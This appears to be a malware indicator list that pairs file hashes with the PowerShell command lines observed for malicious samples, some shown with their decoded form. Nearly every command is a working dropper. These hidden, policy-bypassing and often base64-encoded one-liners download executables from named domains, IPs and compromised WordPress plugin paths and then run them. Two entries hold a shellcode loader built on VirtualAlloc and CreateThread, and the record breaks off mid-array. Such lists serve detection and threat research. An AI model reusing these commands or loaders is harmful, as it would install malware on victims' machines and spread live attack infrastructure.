  101. ccdf687c07973116d88ee9d63795731e9a78bd1dee28a7973bf391c426916d63
  102. PoWerShell -ExecutionPolicy ByPass -NoProfile -enc KAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBtAGEAeABpAC4AYgBlAHIAZwBtAGUAdAB6AGcAZQByAGUAaQAuAGMAaAAvAHMAaQByAHUAdABvAC8AZgBhAHgAZQBxAGkALwBkAG8AcwBvAHgAYQAuAHAAaABwACcALAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnACkAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnADsA --> ((new-object net.webclient).DownloadFile('http://maxi.bergmetzgerei.ch/siruto/faxeqi/dosoxa.php','1asdasd.exe'));Start-Process '1asdasd.exe';
  103. e9392e5a2eb3eff0db114962b70f21c5b02bf6554dad5411834bf535137d2ce9
  104. PoWerShell -ExecutionPolicy ByPass -NoProfile -enc KAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBzADgAZAA5ADAAZAAuAGYAZQBpAG4AZQBzAGEAbABzAGkAegAuAGMAaAAvAHgAaQBoAGUAbQB1AC8AawBvAGMAbwBsAGEALwBrAGkAaABlAHoAYQAuAHAAaABwACcALAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnACkAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnADEAYQBzAGQAYQBzAGQALgBlAHgAZQAnADsA --> ((new-object net.webclient).DownloadFile('http://s8d90d.feinesalsiz.ch/xihemu/kocola/kiheza.php','1asdasd.exe'));Start-Process '1asdasd.exe';
  105. 377b4f293e2d43d0d49e73af61b5dbf2320c8974de8eebaeabcdee7872d7f027
  106. powershell -NoP -sta -NonI -W Hidden -EncodedCommand JABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwBZAFMAVABlAE0ALgBOAEUAdAAuAFcARQBCAEMATABJAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAGEAZABlAFIAUwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAE8AWAB5ACAAPQAgAFsAUwB5AHMAVABFAE0ALgBOAEUAVAAuAFcARQBiAFIARQBxAFUARQBzAHQAXQA6ADoARABFAGYAYQB1AEwAVABXAGUAYgBQAHIATwB4AFkAOwAkAFcAYwAuAFAAcgBvAHgAeQAuAEMAcgBFAGQARQBuAHQAaQBhAGwAUwAgAD0AIABbAFMAeQBTAHQAZQBNAC4ATgBlAFQALgBDAFIARQBEAEUAbgB0AGkAYQBsAEMAYQBDAGgAZQBdADoAOgBEAEUARgBhAFUAbAB0AE4AZQB0AHcAbwByAEsAQwBSAGUAZABlAE4AVABpAEEAbABTADsAJABLAD0AJwB0AFsAJABwAEUAewAuAHwARAB5AG4ARwB9ACMAJQBAACYAdQAxAG8APwAoAFUANABTAGcAcwBrAHcAYABfAHYAJwA7ACQASQA9ADAAOwBbAGMASABhAFIAWwBdAF0AJABiAD0AKABbAEMAaABhAHIAWwBdAF0AKAAkAHcAYwAuAEQAbwB3AE4ATABPAGEARABTAHQAcgBJAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAzADcALgAyADgALgAxADUANQAuADIAMgA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAGIAWABvAHIAJABrAFsAJABJACsAKwAlACQAawAuAEwAZQBOAGcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAE8ASQBOACcAJwApAA== --> $WC=New-Object SYSTeM.NEt.WEBCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeadeRS.ADD('User-Agent',$u);$wc.PrOXy = [SysTEM.NET.WEbREqUEst]::DEfauLTWebPrOxY;$Wc.Proxy.CrEdEntialS = [SySteM.NeT.CREDEntialCaChe]::DEFaUltNetworKCRedeNTiAlS;$K='t[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v';$I=0;[cHaR[]]$b=([Char[]]($wc.DowNLOaDStrInG("http://37.28.155.22:8080/index.asp")))|%{$_-bXor$k[$I++%$k.LeNgTH]};IEX ($B-jOIN'')
  107. e57a2ceee5fd793b294fbca036750c204f4ecfb8e718db0ac2648f298fa9b086
  108. powershell.exe   -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://lulumchiangrai.com/wp-content/plugins/libravatar-replace/systemdll.exe','C:\Users\User1\AppData\Roamingputy.exe');&Start-Process 'C:\Users\User1\AppData\Roamingputy.exe'
  109. 3b7873e04939898118f3e00205aeb69443106d1f3f46d04150c65de749ccf05a
  110. 95c5d5e7d05557aa694b09f97c2675edb14a215c60d04c458b5862f1dc7674e1
  111. a5f8dbd950d9f73c243a0017bccf5deef186d7f1a3eeb6e115fc2762573b5bdb
  112. bf65ac501a838b19b51f68dc078f97d2f3a01033f9a69fe8d7ffe12d7d09e711
  113. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://birch.mcmstudio.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  114. 0397f6675be4a06562f12f9570e061f16d3ae860f3cbd2119c6c76881ae90427
  115. 0ae7a0030e5a4cab698a5e5e9eef1a4a458649287cd2b136fb3600766fed78b2
  116. 2e2b5f469950638185a5f356997106215b610b6dff8e41a50d3be2381a6431c8
  117. 87b16506d20550eda78267944a063f783b5c72dd0391400c324225e0b75af50a
  118. a3df30ffd9d9f2f5ab7978fd22ea704dfd79c58f8cf018c992e33908f13854fa
  119. cddb92d2630f1345f489894a12f188f65fc0d5abfa71c5d9fbdc70866424ec9f
  120. efbd8b4398903a0f91415bd1e695ee1c0a9781999662c6c620a9d304c4bd7287
  121. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://id.mcmweb.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  122. 0c0c90fd4d833786b623dac525e27396d91d33b5fe073bbba147956829f1b7ac
  123. 7b22da70189626512044071b1819a69d6cd15795de70f856defec5b649d94aa2
  124. ecfab97c03abe6ec133c48f063e71155006dbc129a0efb2492b8bafe70ad38ad
  125. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://salmon.mcmweb.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  126. 5281bbfb497bf414b59d9a034c9b49ee7101ef090b6fb50a062b4f2689e1203f
  127. 887df8ea46cc222ca9a1dec1d068f825ff816b598f8228d286254eaa744fb949
  128. ef2f3c7fac16ac3f55d48d630ec970ef32640e747992b4e952e5e4a170abce4b
  129. fe9bb6fa29ee2e447e16edcfd3946e8fc13ddcd4dca32e157782db4cb240c5aa
  130. powershell.exe  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://server.mcmstudio.co.uk/frontspeakers/bandw/nautilus.php','C:\Users\User1\AppData\Local\Temp\VHJvasd.PiF');Start 'C:\Users\User1\AppData\Local\Temp\VHJvasd.piF';
  131. 006e4195c4e4e92ed20d4a012b79a6e351fe2577370e0a535cf68508ae70c50e
  132. ad5dbe00c946cf0c49d225d6758313c2049d25b1c7d84664bf7f6375f45d2420
  133. d1713b640014ba601e19c63c6c706f74f92c61847d1299ad61904f117fef7c13
  134. f9aed40f15a3b34cf1c0b79ec28733802a255d613c1aab1ce392b956b4816310
  135. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://filmdronereview.com/wp-content/plugins/libravatar-replace/scrwin.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  136. 58caeba03211f306663ac727e7e8fd55893ff66371d04a8110f7d91ca39d3b55
  137. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://indo-homecare.com/wp-content/plugins/libravatar-replace/documenti.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  138. 5ebbb9759f8d22d6e97e9528a52da36a4330450f5de43bad5b2826a6b28ef1ea
  139. 9edddbe189c44869b19a9ab0f69c7ad97046f3767b7944bba4f6d751e0900323
  140. e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  141. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://mithunwedskrishna.info/wp-content/plugins/libravatar-replace/schet.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  142. 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
  143. a61100319a2829b2a7d389517b05c24eae79f6e9ae9e154765abd91b7475cf96
  144. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://nindino.com/img/Factuur.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  145. 12e7a44ec7432d0f1c6dd5b20ef097590fba2e848d1e7f3293408dfa2874b1b2
  146. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://twiburc.com/wp-content/plugins/libravatar-replace/sbschet.exe','C:\Users\User1\AppData\Roaming.exe');&Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  147. 08b1ec9557156b22816a06e242d3d6ea6b81d6b9c0f0847a5763250d8a171b79
  148. 42f00149419837d6e920339a695fe01d6c6f873c86369c0672294f7e38719a1b
  149. 5ca7d11477186718a74a44feb97c96e1692085a5320460cad42f7677ec1a44e2
  150. 7357711b885361254952f3479b89dc5f0ac80c540acdfe24abf34415e3a7d197
  151. acbc39cf21b3da76472071550b6693bb45b2dccad4a6828829a8f34301b4be9d
  152. f763bb343fda9de53e84a55f3045a30e6670d3f26d007d66bca5fae073a81de5
  153. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://twiburc.com/wp-content/plugins/libravatar-replace/schet1008.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  154. e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  155. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.aziendacirrito.it/plugins/l.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  156. 104cd9c02f63d3dc6f1b42dcfc573f08143c1a18f24cf5dafe509d3a50a35143
  157. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.kivunrecovery.com/wp-content/plugins/libravatar-replace/novi.schet.doc.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  158. 7af7adc1000193cef4bd81b4962df96517f454503ce58257d6572ecdb2da10a4
  159. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/scrwin.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  160. 58fda26f0ef4692191f69770e449d1f2b26e12784506639037f4cc66188540fc
  161. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/vipiska.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  162. 24b4ca95f30f89c2229d35a7184612f122028588624865ea0f17764fe3d1ee1f
  163. powershell.exe  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.technomodi.com/wp-content/plugins/libravatar-replace/uvedomlenie.doc.exe','C:\Users\User1\AppData\Roaming.exe');Start-Process 'C:\Users\User1\AppData\Roaming.exe'
  164. 004760c7a0a4d6d1da467fed6695cd58b6e1042941ff58a2c7178a733382ddec
  165. 05d73761013f3f7b6e30b506a158717e313c7c89cf5ba7d90275c4b956cc56a7
  166. 641d48ae15a9552cdbb058ee81f9427fe743ee55dbfe42f0bef03049c4382285
  167. c4c7e868a6ce1352a1cee80a1147b3ae3d42d6c133f43d1b91de68931dfb58b9
  168. e1eaef27961419f6a52e60e2a5cf8b9500a9d6a7d29e366283d3c95ca1ce8654
  169. e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  170. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://gymnastnsk.ru/media/media/images/mime-icon-32/file.jpg','C:\Users\User1\AppData\Local\Temp\1.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\1.exe'
  171. 4fb77d5d84651aaea6b719a80141cf67c1d5dde8e91ce43456fd8ad199ab3485
  172. c26a6129e73fbf86f22c5ea263d903fb27f9a35c5266b03ffd3b922698ebb4ee
  173. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://robertsplacements.ru/Dfexe/Away.exe','C:\Users\User1\AppData\Local\Temp\48349.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\48349.exe'
  174. 819471bfbdeab1349fe49ef82e92aea3292e16522db856eb9d5a98fb0ef9debe
  175. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://www.dilkoyayincilik.com/dosyalar/catalog/language/file.jpg','C:\Users\User1\AppData\Local\Temp\1.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\1.exe'
  176. 0ab7fdab7e23c9e65b3fc96721649b7621f3333c0f9c300530b7d67b43305441
  177. 233980d661f76d03a37231133960ae3184ec3920617d3931eeb6ecadba29faa0
  178. 626a35c9fc49e5a4bc1e27c0f1bc8a5709195ce41aa51f2cea72ae817f5ecbe5
  179. 96edc11155cacfc75d8449f08867d37cb54825dfc99280940fc0c553bc19af82
  180. ad1b5c86d870db15d689f51ba86e0e623d26449c821663062677004f1a9b7c31
  181. c5daaf7db43c376143dfd78ffca13a41405c82fbdd2cf54078b9b1852bbb65ae
  182. PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$APPDATA1=Get-ChildItem Env:APPDATA;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVZdj5tGFH33rxhZPNhasxpgABNrpaSNKkWqokq7ah4sP8AwZFExtjBOvUn638s9+A7Guxu1ebnMx517zv0axtHiTrydTtbvq+rDdr9r2tn0L9PUpgr827yqpvON2B+zqtTi0KZt9zGnttsXH+r2j7YRf5ZNe0yrd1W107Pz2t8LcSzrVpzO36fz9+t89dM4vzYmbc3DY/fJGed4tvtlIQbk8+gC+7xyjb49fNFN+1+wt2Z7MO3suWXr1fTtxNl1gXyX5+7D094ItzuTmea9Kcq6bMtdLRwt3I/p1ojpp7IO/Klw62522KfaCKz8dqw1aR6Eu08Ph/axOU6c052ze/NmFGS5kCdPSvoE/UfJ+Uqsf3lqzXqzcQ6UUXkqdLdjlp1YJp2A4iAiyRsmJENeJ3KfNhRtZJ0IfSCMplKPpp5VjmnqE5osOpHFRCultYjNFwWPNBlNyVRAIqK1mEYSVmjkk4qGMh2TOQlMybIhvUIyjTAes7Kclc8YOJsPGzSKEZyQCcWKOQ/K4XCClL2lBVoyyV45IFYBo6mE9QIboV7vh9F41d+A0AxIEt2CjEpCi0mvoN0g46mvWA9hCq84qxHnKLL8QDwbKXt6pNzrXXlkC0kpNg8RZiyQ35BUQopuaN2HRwAKC96FZY+IG3AhfiG5FZFeZEiEnK2+lGkjpjBFiVVJmJWBAcV6SrMyClPGzCW3bYApSupaRGwlSHkaE0Y6tgLiaDC43yc5Yc8hopQzeLWGggsDHgGtL28ykBCGjp6jqYJDPHQyegEG+rvCZ1ZLxbsXwrMjiwvLIWH4hitswAUhcAFxz/qLs0tABovLO6fPh7TuK4sGA8UoxChgRdPEcB38/0T56COaonXjKxeG3qeRR0DoANxhCBNOXN2diEtODAySIl9QITT0NNAG4ZNAQ/R1quw04Dj35b3k0QAZDdWEYBej+OHuHEavb8QcnJzWiohHypJEcJJghIaLIlty3lC7PkoAacSlQMFGg/WXzHJkILPH+hr3RolCxyeRrRL/tUQpzmr4wu3t2XJE1EJbYT01ezfhrhtabSgVBCelLIRXpYILXrP7yIc2IwPohd4FFOHYhQtWNgEIDi68qOBjL52AMn53GW2kPofu4hYgFVTiVcEp3J0JVxj+00CLAx4htX1gX60/JD56bj6CMznTjWBeW8uxNTqgoSXlalLsGjFzyju5ckrhVqabHPTt76b+3D663rxbvbmZi2/0/jk/wNb9C2wzc063D7tuEviz+Y1TzheiO7p2ys1CeHPxXeyOrVsfq2r1z8T5ihfU6PnYebRwTgv60Mvpvk2b1r2vjNkL997oXZ0LemBJ+S8= \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$APPDATA1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -LandScape Bypass IEX $($iex1) -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x89,0xe6,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x60,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x6a,0x50,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x4f,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1e,0x4b,0x0f,0x84,0x7b,0x00,0x00,0x00,0xeb,0xd1,0xe9,0x90,0x00,0x00,0x00,0xe8,0xac,0xff,0xff,0xff,0x2f,0x61,0x6e,0x64,0x61,0x63,0x2e,0x65,0x78,0x65,0x00,0xeb,0x6b,0x31,0xc0,0x5f,0x50,0x6a,0x02,0x6a,0x02,0x50,0x6a,0x02,0x6a,0x02,0x57,0x68,0xda,0xf6,0xda,0x4f,0xff,0xd5,0x93,0x31,0xc0,0x66,0xb8,0x04,0x03,0x29,0xc4,0x54,0x8d,0x4c,0x24,0x08,0x31,0xc0,0xb4,0x03,0x50,0x51,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0x2d,0x58,0x85,0xc0,0x74,0x16,0x6a,0x00,0x54,0x50,0x8d,0x44,0x24,0x0c,0x50,0x53,0x68,0x2d,0x57,0xae,0x5b,0xff,0xd5,0x83,0xec,0x04,0xeb,0xce,0x53,0x68,0xc6,0x96,0x87,0x52,0xff,0xd5,0x6a,0x00,0x57,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0x6a,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0xe8,0x90,0xff,0xff,0xff,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x65,0x78,0x65,0x00,0xe8,0x06,0xff,0xff,0xff,0x67,0x6d,0x6a,0x62,0x6c,0x6f,0x67,0x2e,0x63,0x6f,0x6d,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  183. b8e8a038c2378a609fa5a051d35deceb744431a72f5e5a084d46eb1f697ea113
  184. PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$Homedrive1=Get-ChildItem Env:Homedrive;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVZdj5tGFH33rxhZPNhasxpgABNrpaSNKkWqokq7ah4sP8AwZFExtjBOvUn638s9+A7Guxu1ebnMx517zv0axtHiTrydTtbvq+rDdr9r2tn0L9PUpgr827yqpvON2B+zqtTi0KZt9zGnttsXH+r2j7YRf5ZNe0yrd1W107Pz2t8LcSzrVpzO36fz9+t89dM4vzYmbc3DY/fJGed4tvtlIQbk8+gC+7xyjb49fNFN+1+wt2Z7MO3suWXr1fTtxNl1gXyX5+7D094ItzuTmea9Kcq6bMtdLRwt3I/p1ojpp7IO/Klw62522KfaCKz8dqw1aR6Eu08Ph/axOU6c052ze/NmFGS5kCdPSvoE/UfJ+Uqsf3lqzXqzcQ6UUXkqdLdjlp1YJp2A4iAiyRsmJENeJ3KfNhRtZJ0IfSCMplKPpp5VjmnqE5osOpHFRCultYjNFwWPNBlNyVRAIqK1mEYSVmjkk4qGMh2TOQlMybIhvUIyjTAes7Kclc8YOJsPGzSKEZyQCcWKOQ/K4XCClL2lBVoyyV45IFYBo6mE9QIboV7vh9F41d+A0AxIEt2CjEpCi0mvoN0g46mvWA9hCq84qxHnKLL8QDwbKXt6pNzrXXlkC0kpNg8RZiyQ35BUQopuaN2HRwAKC96FZY+IG3AhfiG5FZFeZEiEnK2+lGkjpjBFiVVJmJWBAcV6SrMyClPGzCW3bYApSupaRGwlSHkaE0Y6tgLiaDC43yc5Yc8hopQzeLWGggsDHgGtL28ykBCGjp6jqYJDPHQyegEG+rvCZ1ZLxbsXwrMjiwvLIWH4hitswAUhcAFxz/qLs0tABovLO6fPh7TuK4sGA8UoxChgRdPEcB38/0T56COaonXjKxeG3qeRR0DoANxhCBNOXN2diEtODAySIl9QITT0NNAG4ZNAQ/R1quw04Dj35b3k0QAZDdWEYBej+OHuHEavb8QcnJzWiohHypJEcJJghIaLIlty3lC7PkoAacSlQMFGg/WXzHJkILPH+hr3RolCxyeRrRL/tUQpzmr4wu3t2XJE1EJbYT01ezfhrhtabSgVBCelLIRXpYILXrP7yIc2IwPohd4FFOHYhQtWNgEIDi68qOBjL52AMn53GW2kPofu4hYgFVTiVcEp3J0JVxj+00CLAx4htX1gX60/JD56bj6CMznTjWBeW8uxNTqgoSXlalLsGjFzyju5ckrhVqabHPTt76b+3D663rxbvbmZi2/0/jk/wNb9C2wzc063D7tuEviz+Y1TzheiO7p2ys1CeHPxXeyOrVsfq2r1z8T5ihfU6PnYebRwTgv60Mvpvk2b1r2vjNkL997oXZ0LemBJ+S8= \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$Homedrive1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -q61QM6X5CKDhOx Bypass IEX $($iex1) -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x89,0xe6,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x60,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x6a,0x50,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x4f,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1e,0x4b,0x0f,0x84,0x7b,0x00,0x00,0x00,0xeb,0xd1,0xe9,0x90,0x00,0x00,0x00,0xe8,0xac,0xff,0xff,0xff,0x2f,0x61,0x6e,0x64,0x61,0x63,0x2e,0x65,0x78,0x65,0x00,0xeb,0x6b,0x31,0xc0,0x5f,0x50,0x6a,0x02,0x6a,0x02,0x50,0x6a,0x02,0x6a,0x02,0x57,0x68,0xda,0xf6,